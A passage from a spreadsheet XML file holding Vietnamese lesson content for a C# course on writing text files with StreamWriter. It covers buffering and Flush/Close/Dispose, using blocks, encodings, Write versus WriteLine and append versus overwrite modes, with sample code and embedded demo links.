            using (StreamWriter writer = new StreamWriter(filePathAscii, false, Encoding.ASCII))
            {
                writer.WriteLine(text);
                Console.WriteLine($"Đã ghi '{text}' vào {filePathAscii} với ASCII.");
            }
        }
        catch (EncoderFallbackException ex)
        {
            // ASCII không thể mã hóa ký tự tiếng Việt, có thể ném ngoại lệ
            Console.WriteLine($"Lỗi khi ghi ASCII: {ex.Message}");
            Console.WriteLine("Các ký tự không thể mã hóa có thể bị thay thế hoặc bỏ qua.");
        }
    }
}
Khi mở vietnamese_ascii.txt, bạn có thể thấy các ký tự tiếng Việt bị biến thành dấu chấm hỏi hoặc các ký tự không đọc được, trong khi vietnamese_utf8.txt sẽ hiển thị chính xác.
Tầm quan trọng của việc Flush() và Close()
Để tối ưu hóa hiệu suất, StreamWriter không ghi từng ký tự hoặc từng dòng dữ liệu trực tiếp vào file ngay lập tức. Thay vào đó, nó sử dụng một bộ đệm (buffer) bên trong. Dữ liệu sẽ được tích lũy trong bộ đệm này và chỉ được ghi ra Stream cơ bản (và cuối cùng là vào file) khi bộ đệm đầy, hoặc khi bạn yêu cầu một cách tường minh.
Flush(): Phương thức này buộc tất cả dữ liệu hiện đang có trong bộ đệm của StreamWriter phải được ghi xuống Stream cơ bản. Điều này không đảm bảo rằng dữ liệu đã được ghi hẳn vào đĩa cứng, mà chỉ là đã được chuyển từ bộ đệm của StreamWriter sang bộ đệm của hệ điều hành hoặc Stream cơ bản.
Khi nào cần dùng Flush()? Khi bạn cần đảm bảo rằng dữ liệu đã được ghi ra file ngay lập tức mà không muốn đóng StreamWriter. Ví dụ, trong các ứng dụng ghi nhật ký (logging) thời gian thực, bạn có thể muốn Flush() sau mỗi lần ghi để đảm bảo các thông báo quan trọng không bị mất nếu chương trình gặp sự cố đột ngột.
Close(): Phương thức này thực hiện hai việc chính:
Nó tự động gọi Flush() để đảm bảo tất cả dữ liệu còn lại trong bộ đệm được ghi ra ngoài.
Nó giải phóng tất cả các tài nguyên hệ thống (như handle file) mà StreamWriter và Stream cơ bản đang nắm giữ. Sau khi Close() được gọi, bạn không thể ghi thêm dữ liệu vào StreamWriter đó nữa.
Tại sao Close() lại quan trọng?
Đảm bảo dữ liệu được ghi đầy đủ: Nếu bạn không gọi Close() (hoặc Dispose()), dữ liệu còn lại trong bộ đệm có thể không bao giờ được ghi vào file, dẫn đến mất mát dữ liệu.
Giải phóng tài nguyên: Hệ điều hành có giới hạn về số lượng file mà một ứng dụng có thể mở đồng thời. Việc không đóng file sẽ giữ tài nguyên đó bị khóa, có thể ngăn các ứng dụng khác (hoặc chính ứng dụng của bạn) truy cập file đó.
Tránh lỗi khóa file: Một file đang được mở và khóa bởi một ứng dụng sẽ không thể bị xóa, di chuyển hoặc sửa đổi bởi các tiến trình khác.
Cách tốt nhất để quản lý StreamWriter là sử dụng khối using:
using (StreamWriter writer = new StreamWriter("my_log.txt", true)) // append mode
{
    writer.WriteLine($"[{DateTime.Now}] Ứng dụng bắt đầu.");
    // ... thực hiện các thao tác khác ...
    writer.WriteLine($"[{DateTime.Now}] Hoàn thành bước 1.");
    // Không cần gọi Flush() hay Close() tường minh
} // writer.Dispose() được gọi tự động, bao gồm Flush() và Close()
Khi khối using kết thúc, phương thức Dispose() của StreamWriter sẽ được gọi tự động. Phương thức Dispose() này lại gọi Close(), đảm bảo rằng dữ liệu được ghi đầy đủ và tài nguyên được giải phóng một cách an toàn và hiệu quả. Đây là mô hình được khuyến nghị và là cách thực hành tốt nhất trong C# khi làm việc với các tài nguyên không được quản lý (unmanaged resources) như file.</t>
        </is>
      </c>
      <c r="W37" s="22" t="inlineStr">
        <is>
          <t># Giới thiệu lớp StreamWriter
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích `StreamWriter` dùng để ghi chữ (văn bản) vào luồng, thường là tệp.
- Kể tên các cách tạo `StreamWriter` phổ biến: theo đường dẫn, có `append`, có `Encoding`, bọc một `FileStream`.
- Giải thích vì sao `StreamWriter` ghi vào bộ đệm (buffer) trước và chỉ đẩy xuống tệp khi `Flush()`, `Close()` hoặc `Dispose()`.
- Dùng khối `using` để bảo đảm dữ liệu luôn được ghi xuống tệp.
- Quan sát tệp vẫn 0 byte khi quên đóng, và có đủ 2 dòng khi dùng `using`, bằng hoạt động mô phỏng.
## StreamWriter là gì?
Khi ghi tệp văn bản, ta ghi **chuỗi ký tự** chứ không phải byte thô. Lớp `StreamWriter` (trong `System.IO`) làm việc này giúp bạn: nó nhận chữ, tự đổi sang byte theo bộ mã hóa (encoding) rồi chuyển cho luồng bên dưới. Mặc định `StreamWriter` dùng **UTF-8** (không có BOM), phù hợp với tiếng Việt.
Ví dụ ngắn nhất:
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        using (var w = new StreamWriter("log.txt"))
        {
            w.WriteLine("Dòng 1");
            w.WriteLine("Dòng 2");
        }
        Console.WriteLine(File.ReadAllText("log.txt"));
        // Dòng 1
        // Dòng 2
    }
}
```
## Các cách tạo StreamWriter
| Cách tạo | Ý nghĩa |
|---|---|
| `new StreamWriter("a.txt")` | Ghi vào `a.txt`. Nếu tệp đã có, nội dung cũ bị ghi đè |
| `new StreamWriter("a.txt", append: true)` | Ghi nối vào cuối tệp, giữ nội dung cũ |
| `new StreamWriter("a.txt", false, Encoding.UTF8)` | Chỉ định rõ bộ mã hóa (cần `using System.Text;`) |
| `new StreamWriter(fileStream)` | Bọc một `Stream` có sẵn như `FileStream` hoặc `MemoryStream` |
Cách cuối cho thấy quan hệ giữa hai lớp. `FileStream` làm việc ở mức **byte** với tệp trên đĩa, còn `StreamWriter` đặt "trên" nó để bạn ghi **chữ**:
```csharp
using (var fs = new FileStream("mydata.txt", FileMode.Create, FileAccess.Write))
using (var writer = new StreamWriter(fs))
{
    writer.WriteLine("Xin chào!");
}   // đóng writer cũng đóng luôn fs
```
Việc dùng `append` sẽ được học kỹ hơn ở bài sau.
## Bộ đệm: chữ chưa xuống tệp ngay
Để chạy nhanh, `StreamWriter` **không ghi từng dòng xuống tệp ngay**. Mỗi lần gọi `Write()` hoặc `WriteLine()`, chữ được gom vào một **bộ đệm** (buffer) trong bộ nhớ. Chỉ khi bộ đệm được đẩy xuống thì tệp mới nhận chữ.
Ba thứ có thể đẩy bộ đệm xuống tệp:
- **`Flush()`**: đẩy toàn bộ chữ đang có trong bộ đệm xuống luồng bên dưới, nhưng vẫn giữ `StreamWriter` mở để ghi tiếp.
- **`Close()`**: tự gọi `Flush()`, rồi giải phóng tệp. Sau đó không ghi thêm được nữa.
- **`Dispose()`**: do khối `using` tự gọi khi ra khỏi khối, làm việc tương đương `Close()`.
Nếu bạn quên cả ba, chữ còn trong bộ đệm **bị mất** khi chương trình kết thúc, và tệp có thể vẫn rỗng.
### Dùng using là cách an toàn nhất
```csharp
using (var w = new StreamWriter("my_log.txt", append: true))
{
    w.WriteLine("Ứng dụng bắt đầu.");
    w.WriteLine("Hoàn thành bước 1.");
}   // Dispose tự gọi Flush rồi đóng tệp
```
Khối `using` đảm bảo `Flush()` và đóng tệp ngay cả khi có lỗi giữa chừng. Việc đóng tệp còn giải phóng tệp để chương trình khác (hoặc chính bạn) mở lại, xóa hay di chuyển được.
&gt; **Lưu ý:** `Flush()` hữu ích khi bạn muốn chữ xuống tệp ngay mà chưa đóng, ví dụ khi ghi nhật ký thời gian thực để không mất thông báo nếu chương trình bị sập.
## Hoạt động: Quên đóng và có using
Mô phỏng dưới đây chạy hai đoạn mã cạnh nhau. Cả hai đều tạo `StreamWriter` rồi ghi hai dòng vào `log.txt`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Quên đóng và có using**. Cột trái là đoạn mã **Quên đóng** (không có `Close()` hay `using`), cột phải là đoạn **Có using**. Hình minh họa mỗi cột có ba hộp nối nhau (Chương trình, Bộ đệm, Tệp), một thanh bộ đệm trong RAM và khung hiển thị `log.txt` trên đĩa kèm số byte.
- Bấm vài bước đầu ở cả hai cột. Sau `WriteLine("Dòng 1")` rồi `WriteLine("Dòng 2")`, thanh bộ đệm đầy dần và hiện `Dòng 1↵Dòng 2↵`. Nhưng tệp `log.txt` trên đĩa vẫn là "(tệp rỗng)", 0 byte.
- Ở cột trái, bấm bước "Chương trình kết thúc". Không ai gọi `Close()` hay `Flush()`, hộp Bộ đệm chuyển đỏ, bộ đệm bị bỏ đi và hiện "(đã mất, chưa bao giờ xuống tệp)". Tệp vẫn 0 byte, hai dòng đã mất.
- Ở cột phải, bấm bước "Ra khỏi khối using". `using` gọi `Dispose`, `Dispose` gọi `Flush`: bộ đệm đổ xuống tệp rồi tệp được đóng. Khung `log.txt` hiện đủ 2 dòng, 16 byte (hai dòng chữ cộng hai ký tự xuống dòng, trong đó chữ `ò` chiếm 2 byte trong UTF-8).
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/ghi-file-van-ban/gioi-thieu-lop-streamwriter/" title="Giới thiệu lớp StreamWriter" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `StreamWriter` ghi vào bộ đệm trước, tệp chỉ nhận chữ khi `Flush()`, `Close()` hoặc `Dispose()` chạy. Luôn đóng `StreamWriter`, tốt nhất bằng `using`, để dữ liệu thật sự được ghi xuống tệp.
## Bộ mã hóa (Encoding)
Mã hóa là quy tắc đổi ký tự thành byte. Ghi bằng một bộ mã hóa và đọc bằng bộ khác sẽ làm chữ bị "lỗi font". Với tiếng Việt, hãy dùng **UTF-8**, cũng là mặc định của `StreamWriter`. Bộ `Encoding.ASCII` chỉ có 128 ký tự cơ bản, nên các chữ có dấu sẽ bị thay bằng dấu `?` khi ghi.
## Tóm tắt
- `StreamWriter` ghi **chữ** vào luồng (thường là tệp) và tự đổi sang byte theo encoding, mặc định UTF-8.
- Có thể tạo từ đường dẫn, kèm `append`, kèm `Encoding`, hoặc bọc một `FileStream`.
- Dữ liệu đi vào **bộ đệm** trước, chỉ xuống tệp khi `Flush()`, `Close()` hoặc `Dispose()`.
- Quên đóng `StreamWriter` có thể làm mất dữ liệu và khóa tệp.
- Khối `using` tự gọi `Dispose()`, nên là cách an toàn và được khuyên dùng.</t>
        </is>
      </c>
    </row>
    <row r="38" ht="409.6" customHeight="1" s="18">
      <c r="A38" s="10" t="n">
        <v>38</v>
      </c>
      <c r="B38" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C38" s="10" t="inlineStr">
        <is>
          <t>Ghi File Văn bản</t>
        </is>
      </c>
      <c r="D38" s="10" t="inlineStr">
        <is>
          <t>Ghi từng dòng và thêm mới nội dung</t>
        </is>
      </c>
      <c r="E38" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F38" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G38" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H38" s="10" t="inlineStr">
        <is>
          <t>Phân biệt Write và WriteLine, và phân biệt chế độ ghi đè với ghi nối.</t>
        </is>
      </c>
      <c r="I38" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J38" s="10" t="inlineStr">
        <is>
          <t>Trình xem tệp 'trước' và 'sau' đặt cạnh nhau; dòng cũ bị gạch ngang khi ghi đè; dòng mới tô xanh; con trỏ ghi | cho thấy Write không xuống dòng.</t>
        </is>
      </c>
      <c r="K38" s="10" t="inlineStr">
        <is>
          <t>H12</t>
        </is>
      </c>
      <c r="L38" s="10" t="inlineStr">
        <is>
          <t>Write và WriteLine | Ghi đè (append: false) | Ghi nối (append: true)</t>
        </is>
      </c>
      <c r="M38" s="10" t="inlineStr">
        <is>
          <t>Write/WriteLine: Write("A"); Write("B"); WriteLine("C"); WriteLine("D") → tệp "ABC↵D↵"; con trỏ ghi minh họa từng bước.
Ghi đè: tệp cũ có 2 dòng; new StreamWriter(path) → tệp bị làm rỗng ngay khi mở; ghi 1 dòng → còn 1 dòng.
Ghi nối: new StreamWriter(path, append: true) → con trỏ đặt ở cuối; ghi thêm 1 dòng → 3 dòng.
Bước cuối mỗi tab: so sánh trước/sau.</t>
        </is>
      </c>
      <c r="N38" s="10" t="inlineStr">
        <is>
          <t>Tệp cũ: Dòng cũ 1, Dòng cũ 2</t>
        </is>
      </c>
      <c r="O38" s="10" t="inlineStr">
        <is>
          <t>Mặc định StreamWriter ghi đè; muốn giữ nội dung cũ dùng append: true hoặc File.AppendAllText.</t>
        </is>
      </c>
      <c r="P38" s="10" t="n"/>
      <c r="Q38" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/ghi-file-van-ban/ghi-tung-dong-va-them-moi-noi-dung/index.html</t>
        </is>
      </c>
      <c r="R38" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/ghi-file-van-ban/ghi-tung-dong-va-them-moi-noi-dung/</t>
        </is>
      </c>
      <c r="S38" s="10" t="n"/>
      <c r="T38" s="12" t="n"/>
      <c r="U38" s="12" t="n"/>
      <c r="V38" s="21" t="inlineStr">
        <is>
          <t>Ghi Dữ liệu: Phương thức Write() và WriteLine()
Trong bài đọc trước, bạn đã làm quen với lớp StreamWriter và vai trò của nó trong việc ghi dữ liệu dạng văn bản. Bây giờ, chúng ta sẽ đi sâu vào hai phương thức cơ bản nhất để thực hiện công việc này: Write() và WriteLine().
Sự khác biệt chính giữa hai phương thức này nằm ở việc WriteLine() tự động thêm một ký tự xuống dòng (new line character) vào cuối chuỗi mà nó ghi, trong khi Write() thì không. Điều này tương tự như sự khác biệt giữa Console.Write() và Console.WriteLine() mà bạn đã biết.
Hãy xem xét ví dụ sau để hiểu rõ hơn:
using System;
using System.IO;
public class GhiDuLieuCoBan
{
    public static void Main(string[] args)
    {
        string tenFile = "duLieuCoBan.txt";
        // Sử dụng khối 'using' để đảm bảo StreamWriter được đóng đúng cách
        using (StreamWriter sw = new StreamWriter(tenFile))
        {
            sw.Write("Đây là dòng đầu tiên.");
            sw.Write("Đây là phần tiếp theo của dòng đầu tiên.");
            sw.WriteLine("Đây là dòng thứ hai.");
            sw.WriteLine("Đây là dòng thứ ba và cuối cùng.");
        }
        Console.WriteLine($"Đã ghi dữ liệu vào file '{tenFile}'.");
        // Đọc lại nội dung file để kiểm tra
        Console.WriteLine("\nNội dung file:");
        Console.WriteLine(File.ReadAllText(tenFile));
    }
}
Khi bạn chạy đoạn code trên, file duLieuCoBan.txt sẽ có nội dung như sau:
Đây là dòng đầu tiên.Đây là phần tiếp theo của dòng đầu tiên.Đây là dòng thứ hai.
Đây là dòng thứ ba và cuối cùng.
Bạn có thể thấy rằng hai lệnh sw.Write() đầu tiên đã ghi nội dung vào cùng một dòng vì không có ký tự xuống dòng nào được thêm vào. Trong khi đó, các lệnh sw.WriteLine() đã tạo ra các dòng riêng biệt.
Cả Write() và WriteLine() đều có nhiều phiên bản quá tải (overload) cho phép bạn ghi các kiểu dữ liệu khác nhau (số nguyên, số thực, boolean, đối tượng...) mà không cần chuyển đổi thủ công sang chuỗi. StreamWriter sẽ tự động gọi phương thức ToString() của đối tượng để chuyển đổi chúng thành chuỗi trước khi ghi.
Cấu hình StreamWriter để Ghi đè hoặc Thêm mới (Append)
Một khía cạnh quan trọng khi làm việc với StreamWriter là cách bạn quyết định xử lý file nếu nó đã tồn tại: bạn muốn ghi đè toàn bộ nội dung cũ hay chỉ muốn thêm dữ liệu vào cuối file?
Điều này được kiểm soát bởi một tham số trong hàm tạo (constructor) của StreamWriter.
Chế độ Ghi đè (Overwrite Mode)
Theo mặc định, khi bạn tạo một StreamWriter với chỉ đường dẫn file, nó sẽ mở file ở chế độ ghi đè. Nếu file tồn tại, nội dung cũ sẽ bị xóa sạch trước khi ghi dữ liệu mới. Nếu file không tồn tại, một file mới sẽ được tạo.
Bạn có thể tường minh chỉ định chế độ ghi đè bằng cách truyền giá trị false cho tham số append trong hàm tạo:
// Mở file ở chế độ ghi đè. Nếu file tồn tại, nội dung cũ sẽ bị xóa.
// Nếu file không tồn tại, một file mới sẽ được tạo.
using (StreamWriter sw = new StreamWriter("ghiDe.txt", false))
{
    sw.WriteLine("Đây là nội dung mới, ghi đè lên bất kỳ nội dung cũ nào.");
    sw.WriteLine("Dòng thứ hai của nội dung mới.");
}
Chế độ Thêm mới (Append Mode)
Để thêm dữ liệu vào cuối một file đã tồn tại mà không làm mất nội dung cũ, bạn cần truyền giá trị true cho tham số append trong hàm tạo của StreamWriter:
// Mở file ở chế độ thêm mới. Nếu file tồn tại, dữ liệu mới sẽ được thêm vào cuối.
// Nếu file không tồn tại, một file mới sẽ được tạo.
using (StreamWriter sw = new StreamWriter("themMoi.txt", true))
{
    sw.WriteLine("Dữ liệu được thêm vào cuối file.");
    sw.WriteLine("Một dòng thêm nữa.");
}
Hãy xem một ví dụ minh họa sự khác biệt giữa hai chế độ này:
using System;
using System.IO;
public class GhiDeVaThemMoi
{
    public static void Main(string[] args)
    {
        string tenFile = "nhatKySuKien.txt";
        // Bước 1: Ghi lần đầu (hoặc ghi đè nếu đã tồn tại)
        using (StreamWriter sw = new StreamWriter(tenFile, false)) // false = ghi đè
        {
            sw.WriteLine($"{DateTime.Now}: Ứng dụng khởi động.");
        }
        Console.WriteLine($"Nội dung file '{tenFile}' sau lần ghi đầu tiên:");
        Console.WriteLine(File.ReadAllText(tenFile));
        // Bước 2: Thêm mới nội dung vào file
        using (StreamWriter sw = new StreamWriter(tenFile, true)) // true = thêm mới
        {
            sw.WriteLine($"{DateTime.Now}: Người dùng đăng nhập.");
            sw.WriteLine($"{DateTime.Now}: Thực hiện tác vụ X.");
        }
        Console.WriteLine($"\nNội dung file '{tenFile}' sau khi thêm mới:");
        Console.WriteLine(File.ReadAllText(tenFile));
        // Bước 3: Ghi đè lại toàn bộ file
        using (StreamWriter sw = new StreamWriter(tenFile, false)) // false = ghi đè
        {
            sw.WriteLine($"{DateTime.Now}: Ứng dụng kết thúc.");
        }
        Console.WriteLine($"\nNội dung file '{tenFile}' sau khi ghi đè lần nữa:");
        Console.WriteLine(File.ReadAllText(tenFile));
    }
}
Kết quả đầu ra của chương trình này sẽ cho bạn thấy rõ cách nội dung file thay đổi qua từng bước:
Lần 1: Chỉ có dòng "Ứng dụng khởi động."
Lần 2: Các dòng "Người dùng đăng nhập." và "Thực hiện tác vụ X." được thêm vào sau dòng cũ.
Lần 3: Dòng "Ứng dụng kết thúc." ghi đè lên toàn bộ nội dung trước đó.
Ứng dụng Thực tế: File Nhật ký và File Cấu hình
Khả năng ghi đè và thêm mới nội dung là nền tảng cho nhiều ứng dụng thực tế.
Tạo File Nhật ký (Log Files)
File nhật ký là một ví dụ điển hình cho việc sử dụng chế độ thêm mới. Các ứng dụng thường cần ghi lại các sự kiện (lỗi, cảnh báo, thông tin hoạt động) theo thời gian. Việc thêm các dòng mới vào cuối file nhật ký đảm bảo rằng không có thông tin cũ nào bị mất.
using System;
using System.IO;
public class Logger
{
    private readonly string _logFilePath;
    public Logger(string logFilePath)
    {
        _logFilePath = logFilePath;
    }
    public void LogInfo(string message)
    {
        GhiNhatKy($"[INFO] {message}");
    }
    public void LogWarning(string message)
    {
        GhiNhatKy($"[WARNING] {message}");
    }
    public void LogError(string message)
    {
        GhiNhatKy($"[ERROR] {message}");
    }
    private void GhiNhatKy(string message)
    {
        try
        {
            // Luôn mở ở chế độ thêm mới (append mode)
            using (StreamWriter sw = new StreamWriter(_logFilePath, true))
            {
                sw.WriteLine($"{DateTime.Now:yyyy-MM-dd HH:mm:ss} - {message}");
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Lỗi khi ghi nhật ký vào file {_logFilePath}: {ex.Message}");
        }
    }
    public static void Main(string[] args)
    {
        Logger appLogger = new Logger("application.log");
        appLogger.LogInfo("Ứng dụng bắt đầu.");
        appLogger.LogWarning("Không tìm thấy file cấu hình tùy chỉnh.");
        // Giả lập một lỗi
        try
        {
            int x = 0;
            int y = 10 / x; // Sẽ gây lỗi chia cho 0
        }
        catch (DivideByZeroException ex)
        {
            appLogger.LogError($"Lỗi nghiêm trọng: {ex.Message}");
        }
        appLogger.LogInfo("Ứng dụng kết thúc.");
        Console.WriteLine("Đã ghi các sự kiện vào file 'application.log'.");
        Console.WriteLine("\nNội dung file 'application.log':");
        Console.WriteLine(File.ReadAllText("application.log"));
    }
}
Tạo File Cấu hình (Configuration Files)
File cấu hình thường lưu trữ các thiết lập của ứng dụng. Khi bạn thay đổi một cài đặt, bạn thường muốn ghi đè toàn bộ file cấu hình để đảm bảo rằng tất cả các thiết lập đều được cập nhật và không có thiết lập cũ nào còn sót lại.
using System;
using System.IO;
using System.Collections.Generic;
public class ConfigManager
{
    private readonly string _configFilePath;
    private Dictionary&lt;string, string&gt; _settings = new Dictionary&lt;string, string&gt;();
    public ConfigManager(string configFilePath)
    {
        _configFilePath = configFilePath;
        LoadSettings();
    }
    private void LoadSettings()
    {
        if (File.Exists(_configFilePath))
        {
            string[] lines = File.ReadAllLines(_configFilePath);
            foreach (string line in lines)
            {
                if (!string.IsNullOrWhiteSpace(line) &amp;&amp; line.Contains("="))
                {
                    string[] parts = line.Split('=', 2); // Chia tối đa 2 phần để xử lý giá trị có dấu '='
                    if (parts.Length == 2)
                    {
                        _settings[parts[0].Trim()] = parts[1].Trim();
                    }
                }
            }
        }
    }
    public void SetSetting(string key, string value)
    {
        _settings[key] = value;
    }
    public string GetSetting(string key, string defaultValue = null)
    {
        return _settings.TryGetValue(key, out string value) ? value : defaultValue;
    }
    public void SaveSettings()
    {
        try
        {
            // Luôn mở ở chế độ ghi đè (overwrite mode) để lưu trạng thái cấu hình hiện tại
            using (StreamWriter sw = new StreamWriter(_configFilePath, false))
            {
                foreach (var entry in _settings)
                {
                    sw.WriteLine($"{entry.Key}={entry.Value}");
                }
            }
            Console.WriteLine($"Đã lưu cấu hình vào file '{_configFilePath}'.");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Lỗi khi lưu cấu hình vào file {_configFilePath}: {ex.Message}");
        }
    }
    public static void Main(string[] args)
    {
        ConfigManager appConfig = new ConfigManager("appsettings.conf");
        Console.WriteLine($"Cài đặt hiện tại (trước khi thay đổi): Tên ứng dụng = {appConfig.GetSetting("AppName", "Chưa đặt")}");
        Console.WriteLine($"Cài đặt hiện tại (trước khi thay đổi): Phiên bản = {appConfig.GetSetting("Version", "1.0")}");
        appConfig.SetSetting("AppName", "Ứng dụng Quản lý Kho");
        appConfig.SetSetting("Version", "2.0.1");
        appConfig.SetSetting("Database", "SQLServer");
        appConfig.SaveSettings();
        // Tải lại cấu hình để kiểm tra
        ConfigManager newConfig = new ConfigManager("appsettings.conf");
        Console.WriteLine($"\nCài đặt sau khi lưu và tải lại:");
        Console.WriteLine($"Tên ứng dụng: {newConfig.GetSetting("AppName")}");
        Console.WriteLine($"Phiên bản: {newConfig.GetSetting("Version")}");
        Console.WriteLine($"Cơ sở dữ liệu: {newConfig.GetSetting("Database")}");
        // Thay đổi một cài đặt và lưu lại
        newConfig.SetSetting("Database", "PostgreSQL");
        newConfig.SaveSettings();
        Console.WriteLine($"\nCài đặt sau khi thay đổi DB và lưu lại:");
        Console.WriteLine($"Cơ sở dữ liệu: {File.ReadAllText("appsettings.conf")}");
    }
}
Bạn có thể thấy rằng trong ví dụ ConfigManager, phương thức SaveSettings() luôn sử dụng chế độ ghi đè (false) để đảm bảo file cấu hình luôn phản ánh trạng thái hiện tại của đối tượng cấu hình, tránh các thiết lập lỗi thời.
Qua bài đọc này, bạn đã nắm vững cách sử dụng Write() và WriteLine() để ghi dữ liệu, cũng như cách điều khiển chế độ ghi đè và thêm mới với StreamWriter. Đây là những kỹ năng cơ bản nhưng cực kỳ quan trọng để xây dựng các ứng dụng có khả năng tương tác mạnh mẽ với hệ thống file.</t>
        </is>
      </c>
      <c r="W38" s="22" t="inlineStr">
        <is>
          <t># Ghi từng dòng và thêm mới nội dung
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Phân biệt `Write()` (không xuống dòng) và `WriteLine()` (ghi rồi xuống dòng) của `StreamWriter`.
- Giải thích tham số `append` quyết định ghi đè hay ghi nối vào tệp đã có.
- Chọn đúng chế độ: ghi nối cho nhật ký, ghi đè cho tệp cần luôn phản ánh trạng thái mới nhất.
- Viết đúng cú pháp `new StreamWriter("t.txt", append: true)`.
- Quan sát tệp `t.txt` thay đổi qua `Write`, `WriteLine`, ghi đè và ghi nối bằng hoạt động mô phỏng.
## Write() và WriteLine()
Hai phương thức này giống `Console.Write()` và `Console.WriteLine()` mà bạn đã biết, chỉ khác là ghi vào tệp:
- **`Write()`** ghi chữ rồi dừng ngay tại đó, **không** xuống dòng.
- **`WriteLine()`** ghi chữ rồi thêm **ký tự xuống dòng**, nên lần ghi kế tiếp sẽ bắt đầu ở dòng mới.
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        using (var w = new StreamWriter("t.txt"))
        {
            w.Write("A");
            w.Write("B");
            w.WriteLine("C");
            w.WriteLine("D");
        }
        Console.Write(File.ReadAllText("t.txt"));
        // ABC
        // D
    }
}
```
Tệp chứa `ABC↵D↵`, tức 2 dòng. Hai lệnh `Write` ghép `A` và `B` cùng dòng, `WriteLine("C")` kết thúc dòng đầu, `WriteLine("D")` ghi dòng thứ hai.
Cả hai phương thức đều có nhiều bản nạp chồng (overload) nhận số, `bool`, đối tượng... Với các kiểu này, chúng tự đổi sang chuỗi trước khi ghi.
## Ghi đè hay ghi nối?
Khi mở tệp đã có nội dung, bạn phải quyết định: xóa nội dung cũ hay giữ lại và ghi thêm? Điều này do tham số `append` trong hàm tạo của `StreamWriter` quyết định.
| Cách mở | Chế độ | Tệp đã có nội dung cũ |
|---|---|---|
| `new StreamWriter("t.txt")` | Ghi đè (mặc định) | Bị làm rỗng ngay khi mở |
| `new StreamWriter("t.txt", append: false)` | Ghi đè | Bị làm rỗng ngay khi mở |
| `new StreamWriter("t.txt", append: true)` | Ghi nối | Giữ nguyên, ghi thêm vào cuối |
Nếu tệp chưa tồn tại, cả hai chế độ đều tạo tệp mới.
### Ghi đè (append: false)
Giả sử `t.txt` đang có hai dòng cũ: `Dòng cũ 1` và `Dòng cũ 2`.
```csharp
using (var w = new StreamWriter("t.txt"))   // mặc định: ghi đè
{
    w.WriteLine("Dòng mới");
}
// t.txt chỉ còn: Dòng mới
```
Điểm cần chú ý: tệp bị làm rỗng **ngay khi mở**, chưa cần ghi gì. Hai dòng cũ biến mất.
### Ghi nối (append: true)
```csharp
using (var w = new StreamWriter("t.txt", append: true))
{
    w.WriteLine("Dòng mới");
}
// t.txt có 3 dòng: Dòng cũ 1, Dòng cũ 2, Dòng mới
```
Ở chế độ này nội dung cũ được giữ nguyên và vạch ghi đặt ở cuối tệp. Với việc ghi nhanh một chuỗi, bạn cũng có thể dùng `File.AppendAllText()`.
## Khi nào dùng chế độ nào?
- **Ghi nối** hợp với **tệp nhật ký (log)**: mỗi sự kiện thêm một dòng ở cuối, không làm mất thông tin cũ.
- **Ghi đè** hợp với **tệp cấu hình** hoặc tệp lưu trạng thái hiện tại: bạn muốn tệp luôn phản ánh đúng dữ liệu mới nhất, không còn thiết lập lỗi thời.
```csharp
using System;
using System.IO;
public class Program
{
    static void Log(string message)
    {
        using (var w = new StreamWriter("application.log", append: true))
        {
            w.WriteLine($"{DateTime.Now:yyyy-MM-dd HH:mm:ss} - {message}");
        }
    }
    public static void Main()
    {
        Log("Ứng dụng bắt đầu.");
        Log("Ứng dụng kết thúc.");
        // application.log có 2 dòng (và thêm 2 dòng nữa mỗi lần chạy lại)
    }
}
```
## Hoạt động: Write, WriteLine, ghi đè và ghi nối
Mô phỏng dưới đây có ba tab. Chữ mới ghi được tô xanh, vạch `|` là vị trí sẽ ghi tiếp. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Write và WriteLine**. Tệp `t.txt` bắt đầu rỗng. Hai lệnh `Write("A")`, `Write("B")` đặt `A` và `B` cạnh nhau trên cùng một dòng. `WriteLine("C")` ghi `C` rồi xuống dòng, vạch ghi chuyển xuống đầu dòng mới. `WriteLine("D")` ghi `D` rồi xuống dòng tiếp. Kết quả cuối là `ABC↵D↵`, 2 dòng.
- Chuyển sang tab **Ghi đè (append: false)**. Tệp có sẵn 2 dòng cũ. Mã chỉ viết `new StreamWriter("t.txt")` (mặc định). Ở bước mở tệp, hai dòng cũ bị gạch ngang và tệp "Sau" trở thành rỗng, chỉ còn vạch ghi. Sau `WriteLine("Dòng mới")`, hai khung Trước và Sau cho thấy: trước 2 dòng, sau 1 dòng.
- Mở tab **Ghi nối (append: true)**. Vẫn tệp 2 dòng cũ nhưng mở với `append: true`. Ở bước mở tệp, nội dung cũ được giữ nguyên và vạch ghi đứng ở cuối tệp. Dòng `Dòng mới` (màu xanh) được thêm ngay sau hai dòng cũ: trước 2 dòng, sau 3 dòng.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/ghi-file-van-ban/ghi-tung-dong-va-them-moi-noi-dung/" title="Ghi từng dòng và thêm mới" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `Write` ghi mà không xuống dòng, `WriteLine` ghi rồi xuống dòng. Còn mặc định `StreamWriter` ghi đè và làm rỗng tệp cũ ngay khi mở, muốn giữ nội dung cũ phải dùng `append: true`.
## Tóm tắt
- `Write()` không xuống dòng, `WriteLine()` ghi rồi xuống dòng.
